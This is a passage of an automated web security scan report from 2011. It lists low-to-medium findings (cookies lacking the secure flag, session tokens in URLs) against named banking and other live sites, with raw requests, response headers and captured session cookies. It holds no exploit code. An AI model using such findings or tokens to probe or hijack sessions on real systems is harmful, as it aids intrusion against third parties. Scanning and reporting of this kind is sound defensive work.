11.4. https://kcustodian.kasikornbank.com/KCustodian/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://kcustodian.kasikornbank.com
Path:   /KCustodian/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KCustodian/ HTTP/1.1
Host: kcustodian.kasikornbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:41 GMT
Server: IBM_HTTP_Server/6.0.2.43 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00002lQTK90JV_QrtQRFqbx3dcx:-1; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 40571


<HTML>
<head>
<script language="Javascript">
</script>

<script language="JavaScript">

<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a
...[SNIP]...

11.5. https://letmechoose.barclays.co.uk/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://letmechoose.barclays.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: letmechoose.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: ASP.NET_SessionId=vkzqdu55pp3tl4mx2lrwzgqb; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:54:27 GMT
Connection: close
Content-Length: 172250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Help me choo
...[SNIP]...

11.6. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ib/login_en.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /K-Online/ib/login_en.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:04 GMT
Set-Cookie: JSESSIONID=0001wQXXNsIyMCMHC2wjXxvowKZ:1DLJUVVU3R; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 43843

...


<html>
<head>
<title>Welcome to K-Cyber Banking</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta http-equi
...[SNIP]...

11.7. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ksec/K-CyberTrade-login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /K-Online/ksec/K-CyberTrade-login.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-Length: 10641
Set-Cookie: JSESSIONID=0001EidkyFV5kaz-4tiOC5P_auE:-1JC3VU2; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


   <script>
       if(location.href.indexOf("kgateway")>=0){
           window.location.href="https://online.kasikornbankgroup.com
...[SNIP]...

11.8. https://www.barclaysfantasyfundmanager.co.uk/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.barclaysfantasyfundmanager.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.barclaysfantasyfundmanager.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 03 May 2011 13:04:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=qcrph4m5vx2ymr3pf14yy545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 50180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head id="ctl00_ctl00_Head"><title>
   Home - Barclays Fantasy Investment Port
...[SNIP]...

11.9. https://www.bizpayment.ktb.co.th/epayview/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bizpayment.ktb.co.th
Path:   /epayview/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /epayview/ HTTP/1.1
Host: www.bizpayment.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:32 GMT
Content-type: text/html;charset=utf-8
X-HP-CAM-COLOR: V=1;ServerAddr=sMVxqLQOS+/Q3oBiJs7EtA==;GUID=1|x02TzA7tbiYpm9br7GTUIA3-tyKGZdPujnJ-HNYIRFg.|L2VwYXl2aWV3L2luZGV4LmpzcA..
Set-Cookie: JSESSIONID=N16N74kl8KmPjvQjKWXLGtGgG2SbBbqGGhm3rQgrkGPLvbQYVzJQ!1246557006; path=/
Connection: close
Set-Cookie: BIGipServerwww.bizpayment.ktb.co.th_ext=2925265162.47873.0000; path=/


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

11.10. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.ktamsmarttrade.com
Path:   /FrontWeb/Home/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FrontWeb/Home/Login.aspx HTTP/1.1
Host: www.ktamsmarttrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:53:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qa1lw355wgkcza550r3dx2z4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=windows-874
Content-Length: 40275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link href="../../App_Th
...[SNIP]...

11.11. https://www.ktb.co.th/internetservice/onlineAccountAction.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.ktb.co.th
Path:   /internetservice/onlineAccountAction.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /internetservice/onlineAccountAction.do HTTP/1.1
Host: www.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _ctout6897=1; JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _uid6897=F468DC21.1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; _cbclose=1; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094; visit_time=440; _cbclose6897=1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-length: 4670
Content-type: text/html;charset=windows-874
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=b5ebc541426318ffffffffb76304a653d8574; Path=/internetservice
Connection: close
Set-Cookie: BIGipServerhttps.www.ktb.co.th=1163657482.47873.0000; path=/


<html>
<link href="css/style.css" rel="stylesheet" type="text/css">
<head>
<title>
KTB - Internet Service
</title>
<meta http-equiv="Content-Type" content="text/html; charset=w
...[SNIP]...

11.12. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/download

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/download HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:47 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

11.13. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/information

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/information HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:48 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 14996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

11.14. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/logon_th

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/logon_th HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:50 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

11.15. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/securetip

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser/securetip HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:52 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:58 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

11.16. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=b5tRlrAlRr3-k4iuyw0__w; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 20
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:14:26 GMT
Expires: Tue, 03 May 2011 13:14:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

11.17. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dimenxion.bangkokbank.com
Path:   /bonprd/jsp/common/loginfiles/es.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bonprd/jsp/common/loginfiles/es.jsp HTTP/1.1
Host: dimenxion.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 19:35:18 GMT
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server
Content-Length: 5649
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: ccms=10.95.56.51.13394661304451318391; path=/
Set-Cookie: JSESSIONID=0a5f4b3e30d9ddc093444b3a40dd8dfffd1456956e4f.e38MchiTchqSb40LbxmSb3uLb30Se6fznA5Pp7ftolbGmkTy; path=/bonprd; secure
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Language: en


<html>
<head>
<title>Dimenxion</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="javascript" src="../../../js/statusbar.js"></script>
<script>
docume
...[SNIP]...

11.18. https://ebank.kasikornbankgroup.com/kbiznet/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebank.kasikornbankgroup.com
Path:   /kbiznet/login.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kbiznet/login.html HTTP/1.1
Host: ebank.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:07 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 24 Feb 2011 11:45:06 GMT
ETag: "41d1-7557-bea93480"
Accept-Ranges: bytes
Content-Length: 30039
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerebankgroup_pool=436381888.47873.0000; path=/


<head>
<title>Welcome to K-BizNet</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
</style>

<link rel="stylesheet" href="/smestatic/c
...[SNIP]...

11.19. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:54:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MSIDCookie=4d53178e-2130-49fe-b455-ab75448035ad; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

11.20. https://ibank.barclays.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ibank.barclays.co.uk
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: olbvisitor=1304385986443869302501514846; tabIndex=1; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304421997884:ss=1304421997884

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 10:20:55 GMT
Content-length: 0
Content-type: text/html
Location: /olb/w/LoginMember.do
Set-Cookie: WLBC=640359596.32800.0000; path=/


11.21. https://www.bizpayment.ktb.co.th/epayview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bizpayment.ktb.co.th
Path:   /epayview

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /epayview HTTP/1.1
Host: www.bizpayment.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 12:53:30 GMT
Content-type: text/html
Location: https://www.bizpayment.ktb.co.th/epayview/
Connection: close
Set-Cookie: BIGipServerwww.bizpayment.ktb.co.th_ext=2925265162.47873.0000; path=/

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.bizpayment.ktb.co.th/e
...[SNIP]...

11.22. https://www.newcb.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newcb.ktb.co.th
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newcb.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:45 GMT
Content-length: 16312
Content-type: text/html
Last-modified: Wed, 23 Mar 2011 08:43:57 GMT
Etag: W/"3fb8-4d89b2cd"
Connection: close
Set-Cookie: BIGipServerwww.newcb.ktb.co.th_ext=2858156298.47873.0000; path=/

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="ncb.css" type="text/css" rel="stylesheet"/>
<title
...[SNIP]...

11.23. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs70_banking/logon/sbuser HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.scbbusinessnet.com/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:08 GMT
Server: IBM_HTTP_Server
Expires: 0
Set-Cookie: JSESSIONID=0000eYJXX4lFMzPC4DgxJ5qN74X:vd1tbof0;Path=/; Secure
Set-Cookie: affiliate=defaultAffiliate;Expires=Sun, 21-May-2079 15:58:16 GMT;Path=/cs70_banking
Cache-Control: no-store
Age: 3 Jun 2011 12:44:09 GMT
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...

12. Session token in URL  previous  next
There are 51 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


12.1. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=45943e9a-fab7-4819-91b8-2ebc6dc19f86&hostname=group.barclays.com&location=%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&url=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&sessionID=1304436104865.66902&fpc=2099162-12fb6735ea2-70159163-1&ts1304436107085.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 03 May 2011 10:21:48 GMT
Connection: keep-alive


12.2. http://marketdata.set.or.th/mkt/images/bg-body.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/bg-body.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/bg-body.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:03 GMT
Server: Apache-Coyote/1.1
ETag: W/"188-1303176654000"
Last-Modified: Tue, 19 Apr 2011 01:30:54 GMT
Content-Type: image/gif
Content-Length: 188

GIF89a..I....................................................................................................!.......,......I...9 ...@...$..HL...Q8. .T....pH,....r.l:...tJ.Z...v..z.......;

